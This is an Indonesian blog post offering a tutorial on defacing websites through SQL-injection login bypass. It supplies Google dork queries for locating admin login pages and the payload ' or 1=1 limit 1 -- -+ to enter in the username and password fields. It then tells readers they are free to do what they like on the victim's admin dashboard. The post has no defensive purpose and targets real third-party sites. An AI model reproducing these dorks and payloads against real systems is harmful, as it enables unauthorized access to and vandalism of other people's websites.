Cara Deface Metode Bypas Sql Login




Assalamualaikum Wr . Wb
oke boss jumpa di blog saya, kali ini saya akan share tutor yaitu " CARA DEFACE METODE BYPAS SQL LOGIN "


Oke langsung simak saja

Pertama kalian siapkan bahan dulu bos
Bukan garam dan gula tapi

1. Hp / laptop
2. Shell (bila perlu)
3. Kuota internet
4. Dork

Yang paling penting ialah kesabaran

Langsung boss kita ngedork dulu, aku bakalan kasih dork nya bos

Inurl:/admin-page/login.php
inurl:/kadmin/login/
inurl:/adm/login.php
inurl:/dash/login/

Kembangin lagi ya boss

Kalian dorking dulu dah lalu pilih salah satu


Nah tampilanya bakalan tempat login gitu
Disitu kalian login dengan

Username :  ' or 1=1 limit 1 -- -+
Password :   ' or 1=1 limit 1 -- -+

Nah tampilanya kek gini bos




Nah kalian klik login aja boss,ntar kalau vuln bakalan masuk ke desboard si admin boss

Contohnya kayak gini



Nah itu udah masuk desboar boss kalian bebas mau ngapain di situ wkwkwk,mau di tebas pakai jso juga gpp .tapi kasian si admin :(

Intinya ya itu terus berjuang bos dan kalau kalian punya guru jangan di lupakan bos itu guru tanpa mereka kita gak akan maju boss

Oke sekian turor dari saya semoga bermanfaat 
Saya D4N6-I  mengucapkan terimakasih dan semangat untuk kalian

See u

Subscribe chanel youtube YOUTUBE VCONRY


Post a Comment

0 Comments